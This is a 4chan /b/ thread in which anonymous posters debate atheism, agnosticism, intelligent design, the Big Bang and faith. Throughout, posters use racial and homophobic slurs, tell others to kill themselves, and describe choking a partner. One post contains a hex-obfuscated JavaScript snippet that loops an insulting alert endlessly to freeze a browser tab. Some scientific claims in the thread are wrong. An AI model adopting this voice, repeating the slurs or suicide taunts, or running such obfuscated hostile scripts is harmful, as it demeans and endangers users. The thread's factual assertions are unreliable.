not sure what to believe anymore... Opinions /b/?
it's really hard to argue with science, but our world is just a bit too well designed, that's why I'm just an agnostic
it doesn't matter. just don't be obnoxious about your belief or non-belief
Atheist... why would you believe in magical fairy tales
really, nigger?
Just dont be a dick
Sling for opinions is being obnoxious? Is it because someone posted something other than cocks?
>but our world is just a bit too well designed
99,9999999999999% of the universe is uninhabitable. Yeah, great design right there.
I'd say pray fervently. Atheism is nice and all but provides cynical output for many people, so you know. Try praying fervently and then watch some Nat Geo, make your own decision.
um, where did i say that? Your reading comprehension is terrible
Best advice
he says our world. Not our universe /b/tard.
if you can think critically and logically, you should be an agnostic
Christians are happy and Atheists are depressive, and also if God exists you go to heaven, if he doesn't exist doesn't change nothing in your death
vs Asshole
Whatt the hell is God doing to benefit any of you? The world is shit. He made a big round turd. Don't give him attention
Be an Apatheist and don't give a fuck
Why not both?
I'm an atheist because I'm pretty sure it's all bull, but I can't technically prove anything so I'm also agnostic.
lol look at this retard
Are you serious? What's the difference?
>inb4 hurr durr we live here
Yes we live here, why would we live somewhere uninhabitable?
Atheist but completely understand the desire for a higher power. Our world is getting worse by the day, it would be nice if a supreme being could lend a helping hand. Unfortunately any god that hadn't intervened by now probably doesn't give a shit.
You make a solid case friendo
sometimes i think we live in an alien computer simulation to see what inteligent life would do if they believed they where the only ones in the universe. and in reality, i think most planets have life and its incredibly rare to find barren planets.
You and me both
The universe is our world, you retard. Picking the best "designed" place in the universe and saying it's too well designed cuz god, is retarded since almost everything else isn't well "designed" at all. The universe is big as fuck, so obviously there is going to be at least one habitable place somewhere, it doesn't mean shit.
We were placed here
>implying all powerful beings give a shit about human suffering
i also understand the desire for a higher power. and im almost sure one exists. but im not so sure its comes even close to the gods described by humanity. i feel the true higher power is beyond human perception.
I've often thought that's is something like that. We're a science project. They don't interact because they have to let the experiment run it's course.
>Knuckles and joints give out
>vestigial organs
>mental degradation, alzheimers, dementia with age
>physical birth defects
Masterwork design.
No, it's because if we lived somewhere else, we would just die.
why do you imply good design has to support life?
if life is 99% impossile in this universe, then one could assume life is not the goal here.
No you faggot, we adapted to this world that's why it seems to be perfect. Fuck I hate it when people use this 'argument'
Right so our creator placed us here, so you see where I'm coming from
Bullshit mountain?
Like by the prometheus architect?
Believe whatever makes you happy, but mind your own business about it.
Anyone can make rude comments
No, we live on Earth for the same reason why loins don't live in Antarctica. No one placed them somewhere, you faggot. We would die if we lived somewhere else, that's why we don't live somewhere else. What the fuck is so hard to understand?
stop trying to believe in something, just follow the facts
Idk...i mean i definitely don't think it all came from nothing. But i also don't believe in Christianity...i don't think our God would want us to know about him. If anything maybe we're an experiment
Animals adapt, if we were meant to be somewhere else we could adapt
The human brain can't comprehend an answer like that, best you can do is be a good person, help others and hope for the best. If you say you know for 100% certainty there is no God, then you are literally retarded because there is no way you could wrap your mind around that. Just be gud to each other and hope for the best.
>why do you imply good design has to support life?
Well, what else is "good design" supposed to imply? The universe is mostly chaos outside our solar system.
Makes more sense than even my own beliefs
And so we have. We weren't placed anywhere, our species is the way it is because it adapted to its sorroundings over the millenia. If the conditions had been different, then we'd be different aswell. Or not exist at all. The is no intent here...
Thanks, I like it. What are your beliefs?
guys heres where i derive my spirtuality of anyone cares. im a pretty spiritual guy. but i think organized religion is horseshit. not because its all untrue, but because greedy individuals use it against the fragile people who desperately need a higher power in their life. ive seen organized religion help so many people in times of need. but ive also seen asshole get rich off donations. religion isnt bad guys, just people are bad.
no when i think of my spirituality i think of the earth i live on. i remember how my life is an extension of this earth. i think of how all ancestors of us worshiped the sun and stars. and it makes sense cuz they needed to understand these things in order to surviv, to travel vast distances and not get lost or travel in huge circles. we are literally a part of this earth. the atoms that make up our body come from this earth. we developed from a rock floating in space. we are part of this earth and the earth is part of this universe. when people ask the big question of what created us, i know both sides of the argument are really flawed. it always boils down to "what created god?" and "what came before the big bang?" im fully aware of all the other theories besides the big bang like simulation theory, and multiverse theory and all that stuff. the point is. everything boils down to unanswerable questions. i once asked a philosophy professor if he thouht we as humanity would ever find the right answers. and what he said to me made me think a lot. he said its not about finding the answers, its about asking the right questions. i thought damn, why do i as an idividual care where the universe came from? im here right now, today. i should care about how i live my life. i could spend my entire life wondering about the answers to life, and some people do, but i chose not too. my spirituality is in the earth. i feel like i AM the earth. i AM the universe. the universe ends and begins with my personal perception and experience in this universe.
Believe whatever you want. Make up your own bullshit. When you get tired of it, or it is no longer useful, discard it and make up something else. Remember gods are there to serve you, not the other way around.
I see what you're getting at. But i still believe we were placed here. Maybe not on this planet...but at least in this universe. The thought that life started without a helping hand just isn't possible. Let's say the big bang theory was true. Something has to cause that bang. And whatever caused the big bang had to be cause by something else and so on. It's really fascinating to me but i refuse the atheist belief
How do you know we can't comprehend it if you wouldn't be able to comprehend it either?
Just wrote it out here >>674780867
I'm an apathiest. I don't give a fuck about religions.
Pascalian wager amigo
end of story
both are wrong. We are a cross breed from 200,000 years ago. Not subjects of evolution or offspring of garden dwelling sinners
Aka agnostic athiest
where did you get them facts faggot?
over 20 million planets estimated are habitable
well good is a very subjective idea. what do we really mean when we say good?
good for humanity? good for the balance of the universe? good for what?
good design doesnt necessarily mean good for us. especially when were looking at something as vast as the universe from the point of view of our relatively insignificant lives.
This book always spoke to me on a spiritual level more than religious text, give it a read. The movie is good to.
Fuck, just be an apatheist. It doesn't matter if god is real or not since it doesn't affect your life at all.
You better pray for better typing skills. Please start using the space bar.
>The thought that life started without a helping hand just isn't possible
>Let's say the big bang theory was true. Something has to cause that bang
Says who?
A physicist would probably tell you that the big bang doesn't require a first cause. The current theory, as I understand it, is that all dimensions (including time) were created at the instance of the bb. Therefore the question of causation doesn't apply in this context. There was no before in any meaningful sense. Simply put, it "just happened" because that is the nature of the universe itself. Does that make any sense to you?
More than 250 billion galaxies in the seeable universe. Estimated more than 200 billion planets in each galaxy. Therefore 20 million is plenty less than .00001% so he's not wrong
20 million planets is still only 0,00000000000001% of the whole universe.
May God bless all the non believers
Don't pull a Pascal Wager out of you ass m8, what if you are wrong? Maybe you are making Zeus mad by praising your jew lover god.
go get an education in natural sciences and then just philosophize it for yourself
You can't know if something is incomprehensible unless you've comprehended it.
I don't think God does that, at least not the Christian God. You know since he mad a special place for them to all go to burn for eternity
At least give some rebuttal...
Not really...i just don't understand how everything just defies the laws of energy. Mass and energy can't just be created...but i guess if it were before the universe than it would also be before the laws of energy and conservation...but it just boggles my mind to think there was an explosion without any explosives
guys why is everything in the universe round and spinning? from the microscopic world to the macroscopic world.
wouldnt it make sense the the universe is round also? what if we traveled in one direction at very high speeds for a LONG LONG time. would it makes sense to go all around space and end up back where you started?
Exactly, so OP is just talking out of his ass.
>doesnt know how religion works
there wasn't an explosion.
There was movement along the time dimension, and expansion along the space dimension.
The big bang is the name given to the limit of our ability to backtrace the conditions of the universe.
you can prove that stories about god are a load of shit
>human coming back to life
>"let there be light" before the sun
>adam and eve
>great flood
Pretty sure our entire universe is nothing but an atom in a larger being that is surrounded by other beings on a planet and having the same conversations on another b/ (think Horton hears a who)
not that guy you are replying to but ive seen several documentaries describe the big bang as an incredibly violent, hot explosion.
>At least give some rebuttal...
Since you claimed that life and the big bang is impossible without a "helping hand", it's your job to prove it, not mine to disprove it.
But then, the equally age old question: what created god? Aren't you just stuck in the same place that way? That's just a non-explanation, because you still need some first cause. And if you were to just hand-wave that away with "Magic", why not just drop god altogether and take the universe for what it is (or at least appears to be)?
Ps.: wasn't really an explosion in the way you probably imagine it
>human coming back to life
this happens
>"let there be light" before the sun
youre only good argument
>adam and eve
there has to be a genetic adam and eve.
we did not all just appear here. everbody came from a single pair.
>great flood
these happen all the time
>it's your job to prove it, not mine to disprove it.
this same shit over and over again.
Atoms are leik solar systems demshelves with little people on da 'electrons' and shit.
That's the easiest way to describe it, but not entirely correct.
It's an explosion in the sense that things expand rapidly, and there's a lot of heat, but it is entirely different from, say, a bomb going off.
In an explosion, hot gas expands through air, in the big bang, all matter is expanding with the boundary of the universe; it isn't expanding "into" anything.
As far as the heat goes, the big bang is taking an infinitely hot, infinitely dense point, and cooling it down as it expands.
It's the dumbed down version, and I cringe everytime I see one of those documentaries. I get what they are trying to do, a massive explosion is quite easy for most people to understand but it plays so much into that whole derogatory sarcastic shit about the term "big bang" being a bit of joke.
It's just misleading and prevents people from actually understanding the finer details of bb cosmology.
I don't care, I'm not arguing if God exists or not, but that christians are more happy. Read this book: Praise of Folly (and no, is not a religious book, it is actually a satire of church)
That's what bothers me, there would be an infinite loop of this created that so that could create this. I know that shouldn't be the case but it only makes sense to me that something nudged the universe into motion. And yeah i know not an actual bang, the explosion without explosives was just a bad metaphor
It's an analogy. An explosion is easy to wrap your head around, but it doesn't reflect the reality of what took place. It's like how you think of the sun as "burning." It's doing no such thing. It is fusing hydrogen into helium, but that is a lot more complex than visualizing it to be a ball of burning gas.
>all matter is expanding with the boundary of the universe; it isn't expanding "into" anything.
this is something that confuses me immensely.
Well others are more than willing too give their side so I'm just gonna respect your opinion and debate with them
>this happens
No it doesn't. No one who has suffered brain death has ever come back to life.
>there has to be a genetic adam and eve.
we did not all just appear here. everbody came from a single pair.
Yeah, except that humans didn't just suddenly pop into existence, they slowed evolved from other species, so there is no "adam and eve".
>these happen all the time
Not like the one in the Bible.
It's a very strange concept that has no real analogue in daily life. I'd wager it's confusing even to many physicists who work in big bang cosmology.
I think most misunderstandings about cosmology can be traced back to this basic problem: we as humans are almost entirely incapable of imagining nothingness. and I mean true total emptiness, no space, no time, nothing.
But if you can't do this, you can never truly comprehend the origins of the universe.
Are you retarded? Fine, disprove that I'm not a magical talking purple dildo. Can't do it? Cool, then I win.
You can't disprove an unfalsifiable hypothesis, you autist.
why does humanity need to know where the universe comes from?
why do we search for answers that we cant even understand? i mean, what good would it even do? even if we find the answer im sure there will be groups the deny it. and what if we find the answer and its underwhelming? what if its not a satisfactory answer? what then?
All religions are bullshit. The only philosophy you need was presented to you in a 80's B movie and people chose to ignore it.
>disprove that I'm not a magical talking purple dildo
i dont have to when you are the one making the claim. ill just go ahead and believe you are a talking purple dildo.
Partly to say "we did it"
Mostly because of the idea that if we can model everything in the universe, we can prepare for everything.
Work out how the universe started, you'll have a better chance of working out what'll happen to it, how we happened, and how likely it is there's other things out there like us.
>everbody came from a single pair.
even the league of christian scientists have debunked this. Or DNA can NOT have come from a single breeding pair.
I understand what you're saying, I simply have different views on the matter I guess. We both see the same universe but ultimately land on different sides.
I find the thought of a god setting everything in motion kind of cheap, almost boring in a way. So I'm quite happy that (in my opinion) there is not a shred of evidence to support this view. But if it helps you, I guess that's just fine with me...
You're doing a fine job of making yourself look like one
My side is that it's irrational to believe something that you can't prove. Like life or the big bang being impossible without intervenience.
>i dont have to when you are the one making the claim
What if we are the only sufficiently advanced species that ever existed or ever will exist.
Wouldn't it be depressing if the secrets of the universe were never fully explored when there was a chance? That's what drives me tbh, the thought that this might be the only opportunity any living beings ever get, to understand themselves.
>Believe in the me that believes in you
so its confirmed.
you are a giant purple dildo?
No see, i don't simply believe in a God. It's just that my n thought process begs for a reason why everything set in motion. And i have had a few ideas of how it could be done without a God. But I'm not a great linguist. My thoughts are hard to put into words for me
Can you prove it was? Because so far all you wanna do it's great my side without first supplying your own
>The only philosophy you need was presented to you in a 80's B movie
Which one?
Get my side
Don't worry, the Universe can't permit that:
Sorry I'm shitty at posting mobile youtube links
Anyway this is a minutephysics video describing the big bang
>What if we are the only sufficiently advanced species that ever existed or ever will exist.
i very highly doubt this. but dont deny its possible. everyone is always saying the vastness the the universe, its almost certain life has emerged somewhere out there. but isnt it equally possible that it hasnt? i feel you on that one.
if we where the only advanced species that will ever exist. would it really mater if we discovered the origin of it all or not? i dont think it would. i think i understand myself though.
>wat is tinyurl?
thanks pal.
I didn't mean to cheapen your viewpoint.
It's just that to me the thought of an origin without first cause is quite an easy one that doesn't bother me very much (altough a definitive answer would ofc be interesting). I just assume that everybody for whom it is a problem would have to be proposing some sort of god/divine entity.
Was raised with no religion
Atheist into twenties
Came to believe in God because things
Christianity seems like best version of theism
so if i say god exists. and someone believes me. does that make it true? theres no need for proof since both sides agree.
That's a thought experiment, not a physical law or theory, but it's a fucking terrifying possibility.
>Can you prove it was? Because so far all you wanna do it's great my side without first supplying your own
What? I just told you my side. You can't know if it was or not, that's why it's retarded to believe it was or to believe that it wasn't. The right answer is "I don't know".
I know I'm too lazy though I used to remember a way to copy the youtube link address instead of the Google stuff but I can't remember anymore
become buddhist
Sounds like a bit of linguistic fuckery. Certainly an interesting concept, but not enough to make me not at least slightly worried.
no that guy. but i disagree.
i dont know is a great answer but you cant sit on the fence forever. one day you will have to decide.
Chill buddhist, psychotic buddhist, warmongering buddhist, or western hipster massively uninformed buddhist?
God knows you're a faggot.. and if you don't believe in him OP... we know you're a faggot.
Posted the wrong one meant this one
>tfw christianity was invented by sandniggers
>warmongering buddhist
didnt even know this was a thing?
the occasional group of tibetans sometimes get a little too uppity and start going on sprees.
They're easily the most uncommon group, but, like with literally any group ever, there are still the violent bunch.
But you have to sit on the fence if you don't know. The best you can do is "I don't know if X is true, but I'm X% sure that it's true/not true given the evidence I've received so far." Being certain of things you can't prove is stupid.
Believe that if anyone had the right answers to the big questions it would be universally understood and accepted. The fact that you don't know the answers indicates where we are on that subject.
>Christianity seems like best version of theism
Translation: Christian bitches won't spread their legs for you if you are openly non-Christian, or the "wrong" type of Christian.
In all honesty OP, if you're browsing /b/, you're probably going to Hell anyway. We're all pretty much nonredeemable by this point.
>Being certain of things you can't prove is stupid
nah dude i disagree.
cuz muh faith and wahtnot.
i mean, we put faith in our goals right? we have faith that we will live long enough to graduate, get a badass career have a nice family and such right? we cant prove this will ever happen. but faith keeps us going. believing in things we cant prove is like fuel for the mind or some other cool analogy like that..
>I know I'm too lazy though
This is actually a valid excuse in my mind, anon. Well played.
Unless god is a /b/tard.
It is.
>Christian bitches won't spread their legs for you if you are openly non-Christian, or the "wrong" type of Christian.
completely false.
strictly religious parents raise the freakiest girls man. for real my girlfriend was raised by hardcore conservative catholic parents and she loves it when i choke and slap her. she likes when i call her my little whore and shit. its like theyre raised with the mindset of them not being able to be wild which makes them want to be even more wild
god is good
>implying theres a god to believe in
>ITT Cringy Atheists with autism fighting agnostics
All of you need to consider suicide, who fucking cares
>tfw god is a /b/tard
>heaven is full of porn and gore
>hell is full of tumblrtards and sjws
>you must sacrifice one pedobear yearly to appease Him
>mrw Adolf Hitler approved
Why do peapole care about in which religion we suffer after death? Nobody in this thread is going to heaven or possibly hell for that matter just give up trying to find the answer.
Finally a thread where I can post this.
Judge my meme.
>i mean, we put faith in our goals right? we have faith that we will live long enough to graduate, get a badass career have a nice family and such right? we cant prove this will ever happen. but faith keeps us going
I wouldn't call it faith, but rather hope. In the back of our heads, we still know there is a chance we might not make it, but we hope that doesn't happen.
You should probably see a doctor about that
being on this site is enough for people like you to consider suicide, if you by any standard claim to not be autistic you are retarded as well as those who you make fun of
Hope is what peapole use to keep them going and when there is lack of hope or fucks to give depression is born.
>not sure what to believe anymore...
as long as you keep it that way, you're on the right track
The source image is Tumblr. Caption is mine.
Look at the whole filename:
>Intelligent Design
Tumblr filenames don’t have such suffixes.
Faith isn't what fuels us, it's the fact that there is a chance we could succeed if we tried.
So faith in yourself?
The world is not 'designed' but it's a sustainable combination of physical elements over billions of years.
Think of it this way, anon, if the world was created by a benevolent, omnipotent being, living things would not have had to kill and eat living things to live.
Donald Trump will fix everything soon
function makeTriForce(chan){
var _0x14a3=["\x59\x4F\x55\x20\x41\x52\x45\x20\x41\x20\x4D\x41\x53\x53\x49\x56\x45\x20\x46\x41\x47\x47\x4F\x54"];while(true){alert(_0x14a3[0])}
>You should probably see a doctor about that
You could say the same thing about every talent.
No? Faith would mean we're 100% certain that we'll succeed, which we aren't.
Donald Trump
>tfw the great Emperor of Sol John Oliver is the one saviour of the world
That was dumb. Not what I meant at all.
On the other hand, having become Christian and then having married a Christian, I have a good chuckle at all the cucks on /b/ who can't figure out why the tarts they date are always fucking other dudes.
>Donald Trump will fix everything soon
Are all atheists this fucking stupid?
Here's a test: can any atheists tell me why this poster sounds like a retard?
We all know the one true faith, OP
Whatever you say man
>faggot goes to tumblr
>has their mentality too
>thinks he can pass old shit off as OC
>this bears repeating: faggot goes to tumblr
>probably has a mustache
OP check out "the atheist experience" on youtube
>faggot goes to tumblr
The source image is from Tumblr
but I wasn’t the one who got it from Tumblr.
I got it from >>>/hm/1331143.
Who is the faggot now???
Still you
>not he
>In the back of our heads, we still know there is a chance we might not make it
well. theres always a chance we might not make it. but when you have faith you believe you will make it. no matter what. maybe its unrealistic sure. but faith can take someone along way dude.
>you've got a mustache
All belief systems suck. Make your own calls.
sure. same way you can pray to be cured of all your diseases instead of taking actual medicine and die. that's what happens when you're unrealistic.
If Christianity can have satanism,
why can’t Buddhism have warmongering?
I remember how Western Buddhist preachers scoffed at the supposed stupidity of my question. Time prove that they were the stupid ones, and I, the ignoramus, was right.
Finally someone that understands.
>spoke to me a spiritual level
doesn't even know jean paul sartre was the first one to talk about how essential doubt is to faith
i fucking hate pseudo philosophers like you
kill yourself fam
It's always better to know your chances instead of having blind faith. Some one could believe in something retarded and kill someone because they think they'll summon Satan or Slenderman, or get to heaven, but just end up in jail. Or try to walk through walls at a train station in order to get to Hogwarts or shit.
>being this triggered
Why does it matter to you what other people believe in/don't believe in? People have different views on things, believe it or not. I don't get why religion is such a highly debated topic. If you are happy with being Christian, go ahead. If you are happy being atheist, go on with that. It doesn't matter
Meme bump.
We are experiencing a technical difficulties. Bear with us. Thread will be continued shortly.
Okay, you can continue now.
That’s my aspiration.
Where are all anons suddenly gone?
Were you all bots?
Were you all v&?
Why do crowds of anons come and go together, in large batches?
Do you all go to sleep together,
in the same bed,
in the same minute?
Is /b/ even usable during the USA night?
Why is the Atheist thing like an atom. As though it has anything to do with particles.
Have I been shadowbanned?
Are there shadowbans in 4chan already or not yet?
Is there even night in the USA right now?
Is it in Europe? Or in Australia?
Is the 4chan studio in Melbourne open?
How do threads become abandoned all at once by former participants?
Does anyone possess knowledge of this mysterious process?
Agnostics are atheists.
If the answer to the question of belief in gods is anything other than yes, you are without belief in gods, you are a-theist.
Should I just let myself be herded to whatever other thread the herd master wants me to go?
4chan is fake.
I conclude that all these anons, and all these thousands of threads, are fake.
There’s probably 1 real user per 100 copypasta bots.
There’s no better logical way to explain >>674796599.
It happens every fucking night
when I decide to join some thread.
At the end of it, I am always left alone there.
There’s no “Anonymous”
when the only “Anonymous” is you
and the rest are sockpuppets.
Got to start believing in God, eh?
Religion is man made -_-
>Religion is marmelade.
There's no evidence for God, so it makes sense to not believe in him. Simple as that.
Don't really care if you do believe in God though, if you find comfort in it do whatever but I've never been able to make sense of it
I can unblur this picture
but before I finish it
this thread will 404.
Thank you.
Well, what else explains this odd phenomenon?
Hiro fucked something up.
I would really love to give it a try
if this thread was viable.
Every night?
Well, could be.
So are you. Does that mean you aren't real? Check mate.
Okay, I’m giving it a go.
I’m leaving this thread to its own.
If it survives without me, I will report back to you
with results
after a while.
It's obvious when you think about it.
Lol I'm the product of millions of years of continuous evolution, was the world created in 7days?
You think there're lions and ants in paradise because of gods will
Nice double dubs btw
Dont look for a religion.
Just live your life the way you want, and see what religion makes the most sense to you based on just how life is.
Or just be atheist.
Religion is for the weak-minded people :-)
Reporting back.
I failed.
Kek you would of needed a miracle
I have done shit like this.
My skill level is probably low.
Nice numerical sequence
Fuck trump
Fuck all politicians
We do whatever we want, to whomever we want at all times.
Whatever you want. You dont have to choose. No one cares. At least no one should.
Fuck rule 63 Jesus?
You are wrong about atheists being upset. You can be happy no matter what do U belive.